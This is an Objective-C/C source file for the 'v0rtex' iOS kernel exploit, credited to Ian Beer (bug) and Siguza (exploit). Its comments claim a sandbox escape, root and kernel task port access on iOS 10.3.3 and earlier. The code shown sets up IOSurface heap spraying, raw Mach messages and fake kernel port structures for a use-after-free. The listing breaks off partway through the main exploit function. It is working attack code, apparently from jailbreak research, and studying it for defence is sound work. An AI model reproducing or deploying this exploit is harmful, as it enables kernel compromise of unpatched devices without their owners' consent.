v0rtex2.m 47 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709710711712713714715716717718719720721722723724725726727728729730731732733734735736737738739740741742743744745746747748749750751752753754755756757758759760761762763764765766767768769770771772773774775776777778779780781782783784785786787788789790791792793794795796797798799800801802803804805806807808809810811812813814815816817818819820821822823824825826827828829830831832833834835836837838839840841842843844845846847848849850851852853854855856857858859860861862863864865866867868869870871872873874875876877878879880881882883884885886887888889890891892893894895896897898899900901902903904905906907908909910911912913914915916917918919920921922923924925926927928929930931932933934935936937938939940941942943944945946947948949950951952953954955956957958959960961962963964965966967968969970971972973974975976977978979980981982983984985986987988989990991992993994995996997998999100010011002100310041005100610071008100910101011101210131014101510161017101810191020102110221023102410251026102710281029103010311032103310341035103610371038103910401041104210431044104510461047104810491050105110521053105410551056105710581059106010611062106310641065106610671068106910701071107210731074107510761077107810791080108110821083108410851086108710881089109010911092109310941095109610971098109911001101110211031104110511061107110811091110111111121113111411151116111711181119112011211122112311241125112611271128112911301131113211331134113511361137113811391140114111421143114411451146114711481149115011511152115311541155115611571158115911601161116211631164116511661167116811691170117111721173117411751176117711781179118011811182118311841185118611871188118911901191119211931194119511961197119811991200120112021203120412051206120712081209121012111212121312141215121612171218121912201221122212231224122512261227122812291230123112321233123412351236123712381239124012411242124312441245124612471248124912501251125212531254125512561257125812591260126112621263126412651266126712681269127012711272127312741275127612771278127912801281128212831284128512861287128812891290129112921293129412951296129712981299130013011302130313041305130613071308130913101311131213131314131513161317131813191320132113221323132413251326132713281329133013311332133313341335133613371338133913401341134213431344134513461347134813491350135113521353135413551356135713581359136013611362136313641365136613671368136913701371137213731374137513761377137813791380138113821383138413851386138713881389139013911392139313941395139613971398139914001401140214031404140514061407140814091410141114121413141414151416141714181419142014211422142314241425142614271428142914301431143214331434143514361437143814391440144114421443144414451446144714481449145014511452145314541455145614571458145914601461146214631464146514661467146814691470147114721473147414751476147714781479148014811482148314841485
  1. // v0rtex
  2. // Bug by Ian Beer.
  3. // Exploit by Siguza.
  4. // Status quo:
  5. // - Escapes sandbox, gets root and tfp0, should work on A7-A10 devices <=10.3.3.
  6. // - Can call arbitrary kernel functions with up to 7 args via KCALL().
  7. // - Relies on mach_zone_force_gc() which was removed in iOS 11, but the same
  8. // effect should be achievable by continuously spraying through zones and
  9. // measuring how long it takes - garbage collection usually takes ages. :P
  10. // - Occasionally seems to mess with SpringBoard, i.e. apps don't open when you
  11. // tap on their icons - sometimes affects only v0rtex, sometimes all of them,
  12. // sometimes even freezes the lock screen. Can happen even if the exploit
  13. // aborts very early on, so I'm not sure whether it's even due to that, or due
  14. // to my broken UI.
  15. // - Most common panic at this point is "pmap_tte_deallocate(): ... refcnt=0x1",
  16. // which can occur when the app is killed, but only if shmem_addr has been
  17. // faulted before. Faulting that page can _sometimes_ increase the ref count
  18. // on its tte entry, which causes the mentioned panic when the task is
  19. // destroyed and its pmap with it. Exact source of this is unknown, but I
  20. // suspect it happening in pmap_enter_options_internal(), depending on page
  21. // compression status (i.e. if the page is compressed refcnt_updated is set to
  22. // true and the ref count isn't increased afterwards, otherwise it is).
  23. // On 32-bit such a panic can be temporarily averted with mlock(), but that
  24. // seems to cause even greater trouble later with zalloc, and on 64-bit mlock
  25. // even refuses to work. Deallocating shmem_addr from our address space does
  26. // not fix the problem, and neither does allocating new memory at that address
  27. // and faulting into it (which should _guarantee_ that the corresponding pmap
  28. // entry is updated). Fixing up the ref count manually is very tedious and
  29. // still seems to cause trouble with zalloc. Calling mach_zone_force_gc()
  30. // after releasing the IOSurfaceRootUserClient port seems to _somewhat_ help,
  31. // as does calling sched_yield() before mach_vm_remap() and faulting the page
  32. // right after, so that's what I'm doing for now.
  33. // In the long term, this should really be replaced by something deterministic
  34. // that _always_ works (like removing the tte entirely).
  35. // Not sure what'll really become of this, but it's certainly not done yet.
  36. // Pretty sure I'll leave iOS 11 to Ian Beer though, for the time being.
  37. #include <errno.h> // errno
  38. #include <sched.h> // sched_yield
  39. #include <stdlib.h> // malloc, free
  40. #include <string.h> // strerror, memset
  41. #include <unistd.h> // usleep, setuid, getuid
  42. #include <mach/mach.h>
  43. #include <mach-o/loader.h>
  44. #include <CoreFoundation/CoreFoundation.h>
  45. #include "common2.h" // LOG, kptr_t
  46. #include "offsets2.h"
  47. #include "v0rtex2.h"
  48. // ********** ********** ********** get rid of ********** ********** **********
  49. #ifdef __LP64__
  50. # define OFFSET_TASK_ITK_SELF 0xd8
  51. # define OFFSET_IOUSERCLIENT_IPC 0x9c
  52. #else
  53. # define OFFSET_TASK_ITK_SELF 0x9c
  54. # define OFFSET_IOUSERCLIENT_IPC 0x5c
  55. #endif
  56. #define IOSURFACE_CREATE_OUTSIZE 0x3c8 /* XXX 0x6c8 for iOS 11.0, 0xbc8 for 11.1.2 */
  57. // ********** ********** ********** constants ********** ********** **********
  58. #ifdef __LP64__
  59. # define KERNEL_MAGIC MH_MAGIC_64
  60. # define KERNEL_HEADER_OFFSET 0x4000
  61. #else
  62. # define KERNEL_MAGIC MH_MAGIC
  63. # define KERNEL_HEADER_OFFSET 0x1000
  64. #endif
  65. #define KERNEL_SLIDE_STEP 0x100000
  66. #define NUM_BEFORE 0x2000
  67. #define NUM_AFTER 0x1000
  68. #define NUM_DATA 0x4000
  69. #define DATA_SIZE 0x1000
  70. #ifdef __LP64__
  71. # define VTAB_SIZE 200
  72. #else
  73. # define VTAB_SIZE 250
  74. #endif
  75. const uint64_t IOSURFACE_CREATE_SURFACE = 0;
  76. const uint64_t IOSURFACE_SET_VALUE = 9;
  77. const uint64_t IOSURFACE_GET_VALUE = 10;
  78. const uint64_t IOSURFACE_DELETE_VALUE = 11;
  79. const uint32_t IKOT_TASK = 2;
  80. enum
  81. {
  82. kOSSerializeDictionary = 0x01000000U,
  83. kOSSerializeArray = 0x02000000U,
  84. kOSSerializeSet = 0x03000000U,
  85. kOSSerializeNumber = 0x04000000U,
  86. kOSSerializeSymbol = 0x08000000U,
  87. kOSSerializeString = 0x09000000U,
  88. kOSSerializeData = 0x0a000000U,
  89. kOSSerializeBoolean = 0x0b000000U,
  90. kOSSerializeObject = 0x0c000000U,
  91. kOSSerializeTypeMask = 0x7F000000U,
  92. kOSSerializeDataMask = 0x00FFFFFFU,
  93. kOSSerializeEndCollection = 0x80000000U,
  94. kOSSerializeMagic = 0x000000d3U,
  95. };
  96. // ********** ********** ********** macros ********** ********** **********
  97. #define UINT64_ALIGN(addr) (((addr) + 7) & ~7)
  98. #define UNALIGNED_COPY(src, dst, size) \
  99. do \
  100. { \
  101. for(volatile uint32_t *_src = (volatile uint32_t*)(src), \
  102. *_dst = (volatile uint32_t*)(dst), \
  103. *_end = (volatile uint32_t*)((uintptr_t)(_src) + (size)); \
  104. _src < _end; \
  105. *(_dst++) = *(_src++) \
  106. ); \
  107. } while(0)
  108. #ifdef __LP64__
  109. # define UNALIGNED_KPTR_DEREF(addr) (((kptr_t)*(volatile uint32_t*)(addr)) | (((kptr_t)*((volatile uint32_t*)(addr) + 1)) << 32))
  110. #else
  111. # define UNALIGNED_KPTR_DEREF(addr) ((kptr_t)*(volatile uint32_t*)(addr))
  112. #endif
  113. #define VOLATILE_ZERO(addr, size) \
  114. do \
  115. { \
  116. for(volatile uintptr_t *ptr = (volatile uintptr_t*)(addr), \
  117. *end = (volatile uintptr_t*)((uintptr_t)(ptr) + (size)); \
  118. ptr < end; \
  119. *(ptr++) = 0 \
  120. ); \
  121. } while(0)
  122. #define RELEASE_PORT(port) \
  123. do \
  124. { \
  125. if(MACH_PORT_VALID((port))) \
  126. { \
  127. _kernelrpc_mach_port_destroy_trap(self, (port)); \
  128. port = MACH_PORT_NULL; \
  129. } \
  130. } while(0)
  131. // ********** ********** ********** IOKit ********** ********** **********
  132. typedef mach_port_t io_service_t;
  133. typedef mach_port_t io_connect_t;
  134. extern const mach_port_t kIOMasterPortDefault;
  135. CFMutableDictionaryRef IOServiceMatching(const char *name) CF_RETURNS_RETAINED;
  136. io_service_t IOServiceGetMatchingService(mach_port_t masterPort, CFDictionaryRef matching CF_RELEASES_ARGUMENT);
  137. kern_return_t IOServiceOpen(io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *client);
  138. kern_return_t IOServiceClose(io_connect_t client);
  139. kern_return_t IOConnectCallStructMethod(mach_port_t connection, uint32_t selector, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt);
  140. kern_return_t IOConnectCallAsyncStructMethod(mach_port_t connection, uint32_t selector, mach_port_t wake_port, uint64_t *reference, uint32_t referenceCnt, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt);
  141. kern_return_t IOConnectTrap6(io_connect_t connect, uint32_t index, uintptr_t p1, uintptr_t p2, uintptr_t p3, uintptr_t p4, uintptr_t p5, uintptr_t p6);
  142. // ********** ********** ********** other unexported symbols ********** ********** **********
  143. kern_return_t mach_vm_remap(vm_map_t dst, mach_vm_address_t *dst_addr, mach_vm_size_t size, mach_vm_offset_t mask, int flags, vm_map_t src, mach_vm_address_t src_addr, boolean_t copy, vm_prot_t *cur_prot, vm_prot_t *max_prot, vm_inherit_t inherit);
  144. // ********** ********** ********** helpers ********** ********** **********
  145. static const char *errstr(int r)
  146. {
  147. return r == 0 ? "success" : strerror(r);
  148. }
  149. static uint32_t transpose(uint32_t val)
  150. {
  151. uint32_t ret = 0;
  152. for(size_t i = 0; val > 0; i += 8)
  153. {
  154. ret += (val % 255) << i;
  155. val /= 255;
  156. }
  157. return ret + 0x01010101;
  158. }
  159. // ********** ********** ********** MIG ********** ********** **********
  160. static kern_return_t my_mach_zone_force_gc(host_t host)
  161. {
  162. #pragma pack(4)
  163. typedef struct {
  164. mach_msg_header_t Head;
  165. } Request;
  166. typedef struct {
  167. mach_msg_header_t Head;
  168. NDR_record_t NDR;
  169. kern_return_t RetCode;
  170. mach_msg_trailer_t trailer;
  171. } Reply;
  172. #pragma pack()
  173. union {
  174. Request In;
  175. Reply Out;
  176. } Mess;
  177. Request *InP = &Mess.In;
  178. Reply *OutP = &Mess.Out;
  179. InP->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
  180. InP->Head.msgh_remote_port = host;
  181. InP->Head.msgh_local_port = mig_get_reply_port();
  182. InP->Head.msgh_id = 221;
  183. InP->Head.msgh_reserved = 0;
  184. kern_return_t ret = mach_msg(&InP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), InP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
  185. if(ret == KERN_SUCCESS)
  186. {
  187. ret = OutP->RetCode;
  188. }
  189. return ret;
  190. }
  191. static kern_return_t my_mach_port_get_context(task_t task, mach_port_name_t name, mach_vm_address_t *context)
  192. {
  193. #pragma pack(4)
  194. typedef struct {
  195. mach_msg_header_t Head;
  196. NDR_record_t NDR;
  197. mach_port_name_t name;
  198. } Request;
  199. typedef struct {
  200. mach_msg_header_t Head;
  201. NDR_record_t NDR;
  202. kern_return_t RetCode;
  203. mach_vm_address_t context;
  204. mach_msg_trailer_t trailer;
  205. } Reply;
  206. #pragma pack()
  207. union {
  208. Request In;
  209. Reply Out;
  210. } Mess;
  211. Request *InP = &Mess.In;
  212. Reply *OutP = &Mess.Out;
  213. InP->NDR = NDR_record;
  214. InP->name = name;
  215. InP->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
  216. InP->Head.msgh_remote_port = task;
  217. InP->Head.msgh_local_port = mig_get_reply_port();
  218. InP->Head.msgh_id = 3228;
  219. InP->Head.msgh_reserved = 0;
  220. kern_return_t ret = mach_msg(&InP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), InP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
  221. if(ret == KERN_SUCCESS)
  222. {
  223. ret = OutP->RetCode;
  224. }
  225. if(ret == KERN_SUCCESS)
  226. {
  227. *context = OutP->context;
  228. }
  229. return ret;
  230. }
  231. kern_return_t my_mach_port_set_context(task_t task, mach_port_name_t name, mach_vm_address_t context)
  232. {
  233. #pragma pack(4)
  234. typedef struct {
  235. mach_msg_header_t Head;
  236. NDR_record_t NDR;
  237. mach_port_name_t name;
  238. mach_vm_address_t context;
  239. } Request;
  240. typedef struct {
  241. mach_msg_header_t Head;
  242. NDR_record_t NDR;
  243. kern_return_t RetCode;
  244. mach_msg_trailer_t trailer;
  245. } Reply;
  246. #pragma pack()
  247. union {
  248. Request In;
  249. Reply Out;
  250. } Mess;
  251. Request *InP = &Mess.In;
  252. Reply *OutP = &Mess.Out;
  253. InP->NDR = NDR_record;
  254. InP->name = name;
  255. InP->context = context;
  256. InP->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
  257. InP->Head.msgh_remote_port = task;
  258. InP->Head.msgh_local_port = mig_get_reply_port();
  259. InP->Head.msgh_id = 3229;
  260. InP->Head.msgh_reserved = 0;
  261. kern_return_t ret = mach_msg(&InP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), InP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
  262. if(ret == KERN_SUCCESS)
  263. {
  264. ret = OutP->RetCode;
  265. }
  266. return ret;
  267. }
  268. // Raw MIG function for a merged IOSurface deleteValue + setValue call, attempting to increase performance.
  269. // Prepare everything - sched_yield() - fire.
  270. static kern_return_t reallocate_buf(io_connect_t client, uint32_t surfaceId, uint32_t propertyId, void *buf, mach_vm_size_t len)
  271. {
  272. #pragma pack(4)
  273. typedef struct {
  274. mach_msg_header_t Head;
  275. NDR_record_t NDR;
  276. uint32_t selector;
  277. mach_msg_type_number_t scalar_inputCnt;
  278. mach_msg_type_number_t inband_inputCnt;
  279. uint32_t inband_input[4];
  280. mach_vm_address_t ool_input;
  281. mach_vm_size_t ool_input_size;
  282. mach_msg_type_number_t inband_outputCnt;
  283. mach_msg_type_number_t scalar_outputCnt;
  284. mach_vm_address_t ool_output;
  285. mach_vm_size_t ool_output_size;
  286. } DeleteRequest;
  287. typedef struct {
  288. mach_msg_header_t Head;
  289. NDR_record_t NDR;
  290. uint32_t selector;
  291. mach_msg_type_number_t scalar_inputCnt;
  292. mach_msg_type_number_t inband_inputCnt;
  293. mach_vm_address_t ool_input;
  294. mach_vm_size_t ool_input_size;
  295. mach_msg_type_number_t inband_outputCnt;
  296. mach_msg_type_number_t scalar_outputCnt;
  297. mach_vm_address_t ool_output;
  298. mach_vm_size_t ool_output_size;
  299. } SetRequest;
  300. typedef struct {
  301. mach_msg_header_t Head;
  302. NDR_record_t NDR;
  303. kern_return_t RetCode;
  304. mach_msg_type_number_t inband_outputCnt;
  305. char inband_output[4096];
  306. mach_msg_type_number_t scalar_outputCnt;
  307. uint64_t scalar_output[16];
  308. mach_vm_size_t ool_output_size;
  309. mach_msg_trailer_t trailer;
  310. } Reply;
  311. #pragma pack()
  312. // Delete
  313. union {
  314. DeleteRequest In;
  315. Reply Out;
  316. } DMess;
  317. DeleteRequest *DInP = &DMess.In;
  318. Reply *DOutP = &DMess.Out;
  319. DInP->NDR = NDR_record;
  320. DInP->selector = IOSURFACE_DELETE_VALUE;
  321. DInP->scalar_inputCnt = 0;
  322. DInP->inband_input[0] = surfaceId;
  323. DInP->inband_input[2] = transpose(propertyId);
  324. DInP->inband_input[3] = 0x0; // Null terminator
  325. DInP->inband_inputCnt = sizeof(DInP->inband_input);
  326. DInP->ool_input = 0;
  327. DInP->ool_input_size = 0;
  328. DInP->inband_outputCnt = sizeof(uint32_t);
  329. DInP->scalar_outputCnt = 0;
  330. DInP->ool_output = 0;
  331. DInP->ool_output_size = 0;
  332. DInP->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
  333. DInP->Head.msgh_remote_port = client;
  334. DInP->Head.msgh_local_port = mig_get_reply_port();
  335. DInP->Head.msgh_id = 2865;
  336. DInP->Head.msgh_reserved = 0;
  337. // Set
  338. union {
  339. SetRequest In;
  340. Reply Out;
  341. } SMess;
  342. SetRequest *SInP = &SMess.In;
  343. Reply *SOutP = &SMess.Out;
  344. SInP->NDR = NDR_record;
  345. SInP->selector = IOSURFACE_SET_VALUE;
  346. SInP->scalar_inputCnt = 0;
  347. SInP->inband_inputCnt = 0;
  348. SInP->ool_input = (mach_vm_address_t)buf;
  349. SInP->ool_input_size = len;
  350. SInP->inband_outputCnt = sizeof(uint32_t);
  351. SInP->scalar_outputCnt = 0;
  352. SInP->ool_output = 0;
  353. SInP->ool_output_size = 0;
  354. SInP->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
  355. SInP->Head.msgh_remote_port = client;
  356. SInP->Head.msgh_local_port = mig_get_reply_port();
  357. SInP->Head.msgh_id = 2865;
  358. SInP->Head.msgh_reserved = 0;
  359. // Deep breath
  360. sched_yield();
  361. // Fire
  362. kern_return_t ret = mach_msg(&DInP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, sizeof(DeleteRequest), (mach_msg_size_t)sizeof(Reply), DInP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
  363. if(ret == KERN_SUCCESS)
  364. {
  365. ret = DOutP->RetCode;
  366. }
  367. if(ret != KERN_SUCCESS)
  368. {
  369. return ret;
  370. }
  371. ret = mach_msg(&SInP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, sizeof(SetRequest), (mach_msg_size_t)sizeof(Reply), SInP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
  372. if(ret == KERN_SUCCESS)
  373. {
  374. ret = SOutP->RetCode;
  375. }
  376. return ret;
  377. }
  378. // ********** ********** ********** data structures ********** ********** **********
  379. #ifdef __LP64__
  380. typedef struct
  381. {
  382. kptr_t prev;
  383. kptr_t next;
  384. kptr_t start;
  385. kptr_t end;
  386. } kmap_hdr_t;
  387. #endif
  388. typedef struct {
  389. uint32_t ip_bits;
  390. uint32_t ip_references;
  391. struct {
  392. kptr_t data;
  393. uint32_t type;
  394. #ifdef __LP64__
  395. uint32_t pad;
  396. #endif
  397. } ip_lock; // spinlock
  398. struct {
  399. struct {
  400. struct {
  401. uint32_t flags;
  402. uint32_t waitq_interlock;
  403. uint64_t waitq_set_id;
  404. uint64_t waitq_prepost_id;
  405. struct {
  406. kptr_t next;
  407. kptr_t prev;
  408. } waitq_queue;
  409. } waitq;
  410. kptr_t messages;
  411. uint32_t seqno;
  412. uint32_t receiver_name;
  413. uint16_t msgcount;
  414. uint16_t qlimit;
  415. #ifdef __LP64__
  416. uint32_t pad;
  417. #endif
  418. } port;
  419. kptr_t klist;
  420. } ip_messages;
  421. kptr_t ip_receiver;
  422. kptr_t ip_kobject;
  423. kptr_t ip_nsrequest;
  424. kptr_t ip_pdrequest;
  425. kptr_t ip_requests;
  426. kptr_t ip_premsg;
  427. uint64_t ip_context;
  428. uint32_t ip_flags;
  429. uint32_t ip_mscount;
  430. uint32_t ip_srights;
  431. uint32_t ip_sorights;
  432. } kport_t;
  433. typedef struct {
  434. union {
  435. kptr_t port;
  436. uint32_t index;
  437. } notify;
  438. union {
  439. uint32_t name;
  440. kptr_t size;
  441. } name;
  442. } kport_request_t;
  443. typedef union
  444. {
  445. struct {
  446. struct {
  447. kptr_t data;
  448. uint32_t reserved : 24,
  449. type : 8;
  450. #ifdef __LP64__
  451. uint32_t pad;
  452. #endif
  453. } lock; // mutex lock
  454. uint32_t ref_count;
  455. uint32_t active;
  456. uint32_t halting;
  457. #ifdef __LP64__
  458. uint32_t pad;
  459. #endif
  460. kptr_t map;
  461. } a;
  462. struct {
  463. char pad[OFFSET_TASK_ITK_SELF];
  464. kptr_t itk_self;
  465. } b;
  466. } ktask_t;
  467. // ********** ********** ********** exploit ********** ********** **********
  468. //kern_return_t v0rtex(offsets_t *off, v0rtex_cb_t callback, void *cb_data)
  469. kern_return_t v0rtex(offsets_t *off, task_t *tfp0, kptr_t *kslide, kptr_t *kernucred)
  470. {
  471. kern_return_t retval = KERN_FAILURE,
  472. ret = 0;
  473. task_t self = mach_task_self();
  474. host_t host = mach_host_self();
  475. io_connect_t client = MACH_PORT_NULL;
  476. mach_port_t stuffport = MACH_PORT_NULL;
  477. mach_port_t realport = MACH_PORT_NULL;
  478. mach_port_t before[NUM_BEFORE] = { MACH_PORT_NULL };
  479. mach_port_t port = MACH_PORT_NULL;
  480. mach_port_t after[NUM_AFTER] = { MACH_PORT_NULL };
  481. mach_port_t fakeport = MACH_PORT_NULL;
  482. mach_vm_address_t shmem_addr = 0;
  483. mach_port_array_t maps = NULL;
  484. io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"));
  485. LOG("service: %x", service);
  486. if(!MACH_PORT_VALID(service))
  487. {
  488. goto out;
  489. }
  490. ret = IOServiceOpen(service, self, 0, &client);
  491. LOG("client: %x, %s", client, mach_error_string(ret));
  492. if(ret != KERN_SUCCESS || !MACH_PORT_VALID(client))
  493. {
  494. goto out;
  495. }
  496. uint32_t dict_create[] =
  497. {
  498. kOSSerializeMagic,
  499. kOSSerializeEndCollection | kOSSerializeDictionary | 1,
  500. kOSSerializeSymbol | 19,
  501. 0x75534f49, 0x63616672, 0x6c6c4165, 0x6953636f, 0x657a, // "IOSurfaceAllocSize"
  502. kOSSerializeEndCollection | kOSSerializeNumber | 32,
  503. 0x1000,
  504. 0x0,
  505. };
  506. union
  507. {
  508. char _padding[IOSURFACE_CREATE_OUTSIZE];
  509. struct
  510. {
  511. mach_vm_address_t addr1;
  512. mach_vm_address_t addr2;
  513. uint32_t id;
  514. } data;
  515. } surface;
  516. memset(&surface, 0, sizeof(surface));
  517. size_t size = sizeof(surface);
  518. ret = IOConnectCallStructMethod(client, IOSURFACE_CREATE_SURFACE, dict_create, sizeof(dict_create), &surface, &size);
  519. LOG("newSurface: %s", mach_error_string(ret));
  520. if(ret != KERN_SUCCESS)
  521. {
  522. goto out;
  523. }
  524. ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &stuffport);
  525. LOG("stuffport: %x, %s", stuffport, mach_error_string(ret));
  526. if(ret != KERN_SUCCESS || !MACH_PORT_VALID(stuffport))
  527. {
  528. goto out;
  529. }
  530. ret = _kernelrpc_mach_port_insert_right_trap(self, stuffport, stuffport, MACH_MSG_TYPE_MAKE_SEND);
  531. LOG("mach_port_insert_right: %s", mach_error_string(ret));
  532. if(ret != KERN_SUCCESS)
  533. {
  534. goto out;
  535. }
  536. ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &realport);
  537. LOG("realport: %x, %s", realport, mach_error_string(ret));
  538. if(ret != KERN_SUCCESS || !MACH_PORT_VALID(realport))
  539. {
  540. goto out;
  541. }
  542. sched_yield();
  543. // Clean out full pages already in freelists
  544. ret = my_mach_zone_force_gc(host);
  545. if(ret != KERN_SUCCESS)
  546. {
  547. LOG("mach_zone_force_gc: %s", mach_error_string(ret));
  548. goto out;
  549. }
  550. for(size_t i = 0; i < NUM_BEFORE; ++i)
  551. {
  552. ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &before[i]);
  553. if(ret != KERN_SUCCESS)
  554. {
  555. LOG("mach_port_allocate: %s", mach_error_string(ret));
  556. goto out;
  557. }
  558. }
  559. ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &port);
  560. if(ret != KERN_SUCCESS)
  561. {
  562. LOG("mach_port_allocate: %s", mach_error_string(ret));
  563. goto out;
  564. }
  565. if(!MACH_PORT_VALID(port))
  566. {
  567. LOG("port: %x", port);
  568. goto out;
  569. }
  570. for(size_t i = 0; i < NUM_AFTER; ++i)
  571. {
  572. ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &after[i]);
  573. if(ret != KERN_SUCCESS)
  574. {
  575. LOG("mach_port_allocate: %s", mach_error_string(ret));
  576. goto out;
  577. }
  578. }
  579. LOG("port: %x", port);
  580. ret = _kernelrpc_mach_port_insert_right_trap(self, port, port, MACH_MSG_TYPE_MAKE_SEND);
  581. LOG("mach_port_insert_right: %s", mach_error_string(ret));
  582. if(ret != KERN_SUCCESS)
  583. {
  584. goto out;
  585. }
  586. #pragma pack(4)
  587. typedef struct {
  588. mach_msg_base_t base;
  589. mach_msg_ool_ports_descriptor_t desc[2];
  590. } StuffMsg;
  591. #pragma pack()
  592. StuffMsg msg;
  593. msg.base.header.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);
  594. msg.base.header.msgh_remote_port = stuffport;
  595. msg.base.header.msgh_local_port = MACH_PORT_NULL;
  596. msg.base.header.msgh_id = 1234;
  597. msg.base.header.msgh_reserved = 0;
  598. msg.base.body.msgh_descriptor_count = 2;
  599. msg.desc[0].address = before;
  600. msg.desc[0].count = NUM_BEFORE;
  601. msg.desc[0].disposition = MACH_MSG_TYPE_MOVE_RECEIVE;
  602. msg.desc[0].deallocate = FALSE;
  603. msg.desc[0].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
  604. msg.desc[1].address = after;
  605. msg.desc[1].count = NUM_AFTER;
  606. msg.desc[1].disposition = MACH_MSG_TYPE_MOVE_RECEIVE;
  607. msg.desc[1].deallocate = FALSE;
  608. msg.desc[1].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
  609. ret = mach_msg(&msg.base.header, MACH_SEND_MSG, (mach_msg_size_t)sizeof(msg), 0, 0, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
  610. LOG("mach_msg: %s", mach_error_string(ret));
  611. if(ret != KERN_SUCCESS)
  612. {
  613. goto out;
  614. }
  615. for(size_t i = 0; i < NUM_BEFORE; ++i)
  616. {
  617. RELEASE_PORT(before[i]);
  618. }
  619. for(size_t i = 0; i < NUM_AFTER; ++i)
  620. {
  621. RELEASE_PORT(after[i]);
  622. }
  623. uint32_t dict[DATA_SIZE / sizeof(uint32_t) + 7] =
  624. {
  625. // Some header or something
  626. surface.data.id,
  627. 0x0,
  628. kOSSerializeMagic,
  629. kOSSerializeEndCollection | kOSSerializeArray | 2,
  630. kOSSerializeString | (DATA_SIZE - 1),
  631. };
  632. dict[DATA_SIZE / sizeof(uint32_t) + 5] = kOSSerializeEndCollection | kOSSerializeString | 4;
  633. // ipc.ports zone uses 0x3000 allocation chunks, but hardware page size before A9
  634. // is actually 0x1000, so references to our reallocated memory may be shifted
  635. // by (0x1000 % sizeof(kport_t))
  636. kport_t triple_kport =
  637. {
  638. .ip_lock =
  639. {
  640. .data = 0x0,
  641. .type = 0x11,
  642. },
  643. #ifdef __LP64__
  644. .ip_messages =
  645. {
  646. .port =
  647. {
  648. .waitq =
  649. {
  650. .waitq_queue =
  651. {
  652. .next = 0x0,
  653. .prev = 0x11,
  654. }
  655. },
  656. },
  657. },
  658. .ip_nsrequest = 0x0,
  659. .ip_pdrequest = 0x11,
  660. #endif
  661. };
  662. for(uintptr_t ptr = (uintptr_t)&dict[5], end = (uintptr_t)&dict[5] + DATA_SIZE; ptr + sizeof(kport_t) <= end; ptr += sizeof(kport_t))
  663. {
  664. UNALIGNED_COPY(&triple_kport, ptr, sizeof(kport_t));
  665. }
  666. // There seems to be some weird asynchronity with freeing on IOConnectCallAsyncStructMethod,
  667. // which sucks. To work around it, I register the port to be freed on my own task (thus increasing refs),
  668. // sleep after the connect call and register again, thus releasing the reference synchronously.
  669. ret = mach_ports_register(self, &port, 1);
  670. LOG("mach_ports_register: %s", mach_error_string(ret));
  671. if(ret != KERN_SUCCESS)
  672. {
  673. goto out;
  674. }
  675. uint64_t ref = 0;
  676. uint64_t in[3] = { 0, 0x666, 0 };
